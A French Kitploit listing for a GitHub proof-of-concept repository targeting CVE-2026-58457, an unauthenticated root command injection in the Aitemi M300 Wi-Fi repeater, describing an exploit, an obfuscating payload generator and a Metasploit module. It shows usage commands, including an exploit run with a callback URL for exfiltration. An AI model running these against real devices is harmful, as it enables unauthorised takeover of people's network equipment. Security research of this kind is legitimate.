Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
Outils/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

Voir le dépôt
2il y a 1 moisPas encore vérifié
Partager

CVE-2026-58457 - Injection de commandes système non authentifiée dans le répéteur Wi-Fi Shenzhen Aitemi M300

[!WARNING] Ce code est fourni EN L'ÉTAT à des fins éducatives et de recherche uniquement. N'utilisez pas ce PoC sur des systèmes de production, des environnements partagés ou des cibles non autorisées.

  • L'exécution ou l'hébergement de ce code peut déclencher des détections antivirus, des alertes de surveillance de sécurité ou des conséquences juridiques en cas de mauvaise utilisation.
  • Les auteurs et les responsables du dépôt déclinent toute responsabilité en cas de dommage, de mauvaise utilisation ou d'activité illégale résultant de ce code.
  • À utiliser exclusivement dans des environnements de laboratoire isolés avec une autorisation appropriée. Destiné uniquement à la recherche défensive, à l'analyse des vulnérabilités et aux tests de l'équipe bleue.

Résumé de la vulnérabilité

Une vulnérabilité d'injection de commandes système non authentifiée existe dans le gestionnaire smacfilter_conf. Les paramètres GET name, enable et mac sont transmis sans assainissement à un appel sprintf() qui construit des commandes UCI exécutées en root.

  • Gravité : Critique (CVSS 9.8)
  • Impact : Exécution de commandes à distance en root sans authentification requise

Outils inclus

  • poc.py - Exploit complet avec prise en charge HTTPS, nouvelles tentatives, délai d'attente et exfiltration par callback.
  • val.py - Validateur de vulnérabilité sûr et passif (utilise la commande id inoffensive).
  • gen.py - Générateur de payloads avancé avec plusieurs techniques d'obfuscation.
  • MITIGATIONS.md - Mesures défensives recommandées.
  • Module Metasploit - Disponible dans le répertoire exploit/.

Installation

root@kitploit:~
pip install requests

Utilisation rapide

  1. Valider (sûr)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. Exploiter (tests autorisés uniquement)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Générer des payloads obfusqués
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. Déplacer le module
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Tout recharger
root@kitploit:~
msfconsole -q -x "reload_all"

Références

  • CVE-2026-58457
  • Avis VulnCheck
  • Divulgation GitHub

Les étoiles et les contributions sont les bienvenues - en particulier les améliorations des contournements ou des variantes de firmware supplémentaires.

Télécharger l’outil